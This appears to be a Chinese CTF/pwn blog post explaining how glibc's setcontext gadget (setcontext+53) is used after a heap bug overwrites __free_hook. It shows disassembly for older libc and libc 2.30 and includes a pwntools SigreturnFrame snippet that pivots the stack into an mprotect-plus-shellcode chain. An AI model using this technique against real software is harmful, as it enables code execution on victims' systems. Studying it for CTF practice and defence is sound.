再次看setcontext在PWN中的利用

August 5, 2020 PWN 访问: 292 次

低版本LIBC

通常情况下是通过堆上的漏洞,来修改__free_hooksetcontext+53
setcontext汇编源码:

pwndbg> disassemble setcontext
Dump of assembler code for function setcontext:
   0x00007ffff7808b50 <+0>: push   rdi
   0x00007ffff7808b51 <+1>: lea    rsi,[rdi+0x128]
   0x00007ffff7808b58 <+8>: xor    edx,edx
   0x00007ffff7808b5a <+10>:    mov    edi,0x2
   0x00007ffff7808b5f <+15>:    mov    r10d,0x8
   0x00007ffff7808b65 <+21>:    mov    eax,0xe
   0x00007ffff7808b6a <+26>:    syscall 
   0x00007ffff7808b6c <+28>:    pop    rdi
   0x00007ffff7808b6d <+29>:    cmp    rax,0xfffffffffffff001
   0x00007ffff7808b73 <+35>:    jae    0x7ffff7808bd0 <setcontext+128>
   0x00007ffff7808b75 <+37>:    mov    rcx,QWORD PTR [rdi+0xe0]
   0x00007ffff7808b7c <+44>:    fldenv [rcx]
   0x00007ffff7808b7e <+46>:    ldmxcsr DWORD PTR [rdi+0x1c0]
   0x00007ffff7808b85 <+53>:    mov    rsp,QWORD PTR [rdi+0xa0]
   0x00007ffff7808b8c <+60>:    mov    rbx,QWORD PTR [rdi+0x80]
   0x00007ffff7808b93 <+67>:    mov    rbp,QWORD PTR [rdi+0x78]
   0x00007ffff7808b97 <+71>:    mov    r12,QWORD PTR [rdi+0x48]
   0x00007ffff7808b9b <+75>:    mov    r13,QWORD PTR [rdi+0x50]
   0x00007ffff7808b9f <+79>:    mov    r14,QWORD PTR [rdi+0x58]
   0x00007ffff7808ba3 <+83>:    mov    r15,QWORD PTR [rdi+0x60]
   0x00007ffff7808ba7 <+87>:    mov    rcx,QWORD PTR [rdi+0xa8]
   0x00007ffff7808bae <+94>:    push   rcx
   0x00007ffff7808baf <+95>:    mov    rsi,QWORD PTR [rdi+0x70]
   0x00007ffff7808bb3 <+99>:    mov    rdx,QWORD PTR [rdi+0x88]
   0x00007ffff7808bba <+106>:   mov    rcx,QWORD PTR [rdi+0x98]
   0x00007ffff7808bc1 <+113>:   mov    r8,QWORD PTR [rdi+0x28]
   0x00007ffff7808bc5 <+117>:   mov    r9,QWORD PTR [rdi+0x30]
   0x00007ffff7808bc9 <+121>:   mov    rdi,QWORD PTR [rdi+0x68]
   0x00007ffff7808bcd <+125>:   xor    eax,eax
   0x00007ffff7808bcf <+127>:   ret    
   0x00007ffff7808bd0 <+128>:   mov    rcx,QWORD PTR [rip+0x37c2a1]        # 0x7ffff7b84e78
   0x00007ffff7808bd7 <+135>:   neg    eax
   0x00007ffff7808bd9 <+137>:   mov    DWORD PTR fs:[rcx],eax
   0x00007ffff7808bdc <+140>:   or     rax,0xffffffffffffffff
   0x00007ffff7808be0 <+144>:   ret    
End of assembler dump.

为了使攻击更稳定,所以直接把程序流劫持到setcontext+53,这里的话和SROP是一样的,可以通过pwntools模块快速生成payload,如下所示

frame = SigreturnFrame()
frame.rdi = 0
frame.rsi = new_area #
frame.rdx = 0x2000
frame.rsp = new_area
frame.rip = libc_base + 0x00000000000bc375 #: syscall; ret; 

然后输入我们的ROP和shellcode在new_area,ROP的操作是先利用mprotect把new_area申请成可执行的段,然后执行shellcode即可

高版本LIBC(2.30)

setcontext:

pwndbg> disassemble setcontext 
Dump of assembler code for function setcontext:
   0x0000000000058000 <+0>: repz nop edx
   0x0000000000058004 <+4>: push   rdi
   0x0000000000058005 <+5>: lea    rsi,[rdi+0x128]
   0x000000000005800c <+12>:    xor    edx,edx
   0x000000000005800e <+14>:    mov    edi,0x2
   0x0000000000058013 <+19>:    mov    r10d,0x8
   0x0000000000058019 <+25>:    mov    eax,0xe
   0x000000000005801e <+30>:    syscall 
   0x0000000000058020 <+32>:    pop    rdx
   0x0000000000058021 <+33>:    cmp    rax,0xfffffffffffff001
   0x0000000000058027 <+39>:    jae    0x5814f <setcontext+335>
   0x000000000005802d <+45>:    mov    rcx,QWORD PTR [rdx+0xe0]
   0x0000000000058034 <+52>:    fldenv [rcx]
   0x0000000000058036 <+54>:    ldmxcsr DWORD PTR [rdx+0x1c0]
   0x000000000005803d <+61>:    mov    rsp,QWORD PTR [rdx+0xa0]
   0x0000000000058044 <+68>:    mov    rbx,QWORD PTR [rdx+0x80]
   0x000000000005804b <+75>:    mov    rbp,QWORD PTR [rdx+0x78]
   0x000000000005804f <+79>:    mov    r12,QWORD PTR [rdx+0x48]
   0x0000000000058053 <+83>:    mov    r13,QWORD PTR [rdx+0x50]
   0x0000000000058057 <+87>:    mov    r14,QWORD PTR [rdx+0x58]
   0x000000000005805b <+91>:    mov    r15,QWORD PTR [rdx+0x60]
   0x000000000005805f <+95>:    test   DWORD PTR fs:0x48,0x2
   0x000000000005806b <+107>:   je     0x58126 <setcontext+294>
   0x0000000000058071 <+113>:   mov    rsi,QWORD PTR [rdx+0x3a8]
   0x0000000000058078 <+120>:   mov    rdi,rsi
   0x000000000005807b <+123>:   mov    rcx,QWORD PTR [rdx+0x3b0]
   0x0000000000058082 <+130>:   cmp    rcx,QWORD PTR fs:0x78
   0x000000000005808b <+139>:   je     0x580c5 <setcontext+197>
   0x000000000005808d <+141>:   mov    rax,QWORD PTR [rsi-0x8]
   0x0000000000058091 <+145>:   and    rax,0xfffffffffffffff8
   0x0000000000058095 <+149>:   cmp    rax,rsi
   0x0000000000058098 <+152>:   je     0x580a0 <setcontext+160>
   0x000000000005809a <+154>:   sub    rsi,0x8
   0x000000000005809e <+158>:   jmp    0x5808d <setcontext+141>
   0x00000000000580a0 <+160>:   mov    rax,0x1
   0x00000000000580a7 <+167>:   repz rex.W lfence 
   0x00000000000580ac <+172>:   repz (bad) 
   0x00000000000580af <+175>:   outs   dx,BYTE PTR ds:[rsi]
   0x00000000000580b0 <+176>:   clc    
   0x00000000000580b1 <+177>:   repz (bad) 
   0x00000000000580b4 <+180>:   (bad)  
   0x00000000000580b5 <+181>:   mov    rax,QWORD PTR [rdx+0x3b0]
   0x00000000000580bc <+188>:   mov    QWORD PTR fs:0x78,rax
   0x00000000000580c5 <+197>:   repz nop rcx
   0x00000000000580ca <+202>:   sub    rcx,rdi
   0x00000000000580cd <+205>:   je     0x580ec <setcontext+236>
   0x00000000000580cf <+207>:   neg    rcx
   0x00000000000580d2 <+210>:   shr    rcx,0x3
   0x00000000000580d6 <+214>:   mov    esi,0xff
   0x00000000000580db <+219>:   cmp    rcx,rsi
   0x00000000000580de <+222>:   cmovb  rsi,rcx
   0x00000000000580e2 <+226>:   repz rex.W (bad) 
   0x00000000000580e6 <+230>:   out    dx,al
   0x00000000000580e7 <+231>:   sub    rcx,rsi
   0x00000000000580ea <+234>:   ja     0x580db <setcontext+219>
   0x00000000000580ec <+236>:   mov    rsi,QWORD PTR [rdx+0x70]
   0x00000000000580f0 <+240>:   mov    rdi,QWORD PTR [rdx+0x68]
   0x00000000000580f4 <+244>:   mov    rcx,QWORD PTR [rdx+0x98]
   0x00000000000580fb <+251>:   mov    r8,QWORD PTR [rdx+0x28]
   0x00000000000580ff <+255>:   mov    r9,QWORD PTR [rdx+0x30]
   0x0000000000058103 <+259>:   mov    r10,QWORD PTR [rdx+0xa8]
   0x000000000005810a <+266>:   mov    rdx,QWORD PTR [rdx+0x88]
   0x0000000000058111 <+273>:   repz nop rax
   0x0000000000058116 <+278>:   cmp    r10,QWORD PTR [rax]
   0x0000000000058119 <+281>:   mov    eax,0x0
   0x000000000005811e <+286>:   jne    0x58123 <setcontext+291>
   0x0000000000058120 <+288>:   push   r10
   0x0000000000058122 <+290>:   ret    
   0x0000000000058123 <+291>:   jmp    r10
   0x0000000000058126 <+294>:   mov    rcx,QWORD PTR [rdx+0xa8]
   0x000000000005812d <+301>:   push   rcx
   0x000000000005812e <+302>:   mov    rsi,QWORD PTR [rdx+0x70]
   0x0000000000058132 <+306>:   mov    rdi,QWORD PTR [rdx+0x68]
   0x0000000000058136 <+310>:   mov    rcx,QWORD PTR [rdx+0x98]
   0x000000000005813d <+317>:   mov    r8,QWORD PTR [rdx+0x28]
   0x0000000000058141 <+321>:   mov    r9,QWORD PTR [rdx+0x30]
   0x0000000000058145 <+325>:   mov    rdx,QWORD PTR [rdx+0x88]
   0x000000000005814c <+332>:   xor    eax,eax
   0x000000000005814e <+334>:   ret    
   0x000000000005814f <+335>:   mov    rcx,QWORD PTR [rip+0x191d1a]        # 0x1e9e70
   0x0000000000058156 <+342>:   neg    eax
   0x0000000000058158 <+344>:   mov    DWORD PTR fs:[rcx],eax
   0x000000000005815b <+347>:   or     rax,0xffffffffffffffff
   0x000000000005815f <+351>:   ret    
End of assembler dump.

添加新评论